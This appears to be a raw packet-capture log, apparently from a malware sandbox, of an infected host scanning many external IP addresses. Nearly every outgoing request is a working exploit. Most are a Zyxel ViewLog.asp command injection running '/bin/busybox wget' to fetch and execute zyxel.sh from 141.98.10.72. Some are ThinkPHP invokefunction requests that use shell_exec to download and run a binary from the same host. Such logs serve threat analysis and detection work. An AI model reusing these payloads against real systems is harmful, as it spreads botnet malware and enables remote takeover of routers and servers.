Feb 14, 2024 09:29:03.746347904 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:03:14 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.15	40798	95.86.90.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.499679089 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.15	45132	31.154.131.34	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.504359961 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.15	53254	31.136.11.229	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.666949034 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:04.282903910 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:05.530831099 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:08.122754097 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:13.242681026 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:23.226326942 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.961915016 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.920576096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.15	48390	94.131.113.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.676199913 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:03.920831919 CET	47	IN	HTTP/1.1 400 Bad Request Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.15	46950	95.213.194.206	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.677047014 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:04.033205986 CET	1286	IN	HTTP/1.1 500 Server Error Date: Wed, 14 Feb 2024 08:29:03 GMT X-Content-Type-Options: nosniff Content-Type: text/html;charset=utf-8 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache,no-store,must-revalidate X-Hudson-Theme: default Referrer-Policy: same-origin Cross-Origin-Opener-Policy: same-origin Set-Cookie: JSESSIONID.e3e8558e=node02px8ovnem08wv6yl1s578sz28548.node0; Path=/; HttpOnly X-Hudson: 1.395 X-Jenkins: 2.396 X-Jenkins-Session: 5190ba09 X-Frame-Options: sameorigin Content-Encoding: gzip X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAny9bQMI8mDV7xdd68MEmdE7lMoS2X9VPOeiOEuCqI4IVT3/QgfP732Cl3X1xyxCVbLi0CRoMQkPXmjXPyD9yyX8R/48EsEU75thF23wXByoICM+bILy9O1dkHmWxRC6LAJA88GxraI+v0Bw3XgdrnHt43wpS5fJCHncKtgE2gPoiaESBJnJuE6pwwF8gfQ96qRZIhpaQnsKeDV52PKCnZUfPPxezIcT8Jz+uz9ZRYyQ/m9bxnq+YhJ/QMp9TKW9tyuUS9K9VzPN1wQESmvsQ+NQ1aJYcAKx74WnCf4nuvRcOkUIbTd6lQqpD36M09m5h4IOMiWKTwafDA5c4qKb2TQIDAQAB Content-Length: 2169 Connection: close Server: Jetty(10.0.13) Data Raw: 1f 8b 08 00 00 00 00 00 00 ff b5 59 eb 6e e3 36 16 fe df a7 60 35 58 cc 8f 96 ba db b2 67 6d 2f e6 56 74 8a 6c 53 4c 66 6f 58 2c 0c 4a a2 2d 26 92 a8 92 94 9d f4 69 f6 59 fa 64 3d 24 25 5b ce 38 89 33 9e 06 30 45 91 87 1f 0f cf 39 3c fc a8 7c 83 d0 37 08 cd be 7d 77 f9 f6 d3 7f 7e 79 8f 0a 55 95 8b 59 57 52 92 23 41 e5 3f 3e 5e cc 1d 4f 2a a2 58 e6 8d 82 a9 9f 12 7f ea a0 9c 28 82 05 e7 aa 15 e5 dc e9 df a9 34 af 0f 88 d3 5b 45 6b c9 78 2d 31 d9 10 56 92 b4 a4 73 47 89 96 76 02 6d cd 14 56 54 aa b9 b3 22 a5 ec 9b 59 45 d6 0f 20 7b b6 af 13 cc 44 5b a5 58 6b 4e c5 dc f9 89 d6 37 0c e6 7a ab 5b 0f 24 36 a4 6c 61 e6 28 f1 47 24 89 68 3a a6 d3 cc 9f 44 f1 6a 9a 04 31 e0 86 63 0a 5d 50 ae 12 7f 1a 85 e1 8a 8c 69 36 0d c6 fe 78 12 24 a3 74 94 4f 92 f1 24 1f 3b 0b b0 9e 31 21 14 a6 Data Ascii: Yn6`5Xgm/VtlSLfoX,J-&iYd=$%[830E9<\|7}w~yUYWR#A?>^O*X(4[Ekx-1VsGvmVT"YE {D[XkN7z[$6la(G$h:Dj1c]Pi6x$tO$;1!

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.15	56468	85.184.184.242	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.677591085 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.15	39236	112.168.50.100	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.691468954 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:03.967278004 CET	512	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 345 Connection: close Date: Wed, 14 Feb 2024 17:09:46 GMT Server: lighttpd/1.4.55 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.15	38690	112.184.60.51	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.705439091 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:03.993036985 CET	339	IN	HTTP/1.0 400 Bad Request Date: Wed, 14 Feb 2024 08:28:59 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.15	56474	94.121.119.36	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.737587929 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.15	37266	94.123.251.43	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.737806082 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.15	57578	94.121.33.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.737998009 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.15	35442	94.120.252.215	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.740561962 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.15	40806	94.183.153.124	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:03.957417011 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
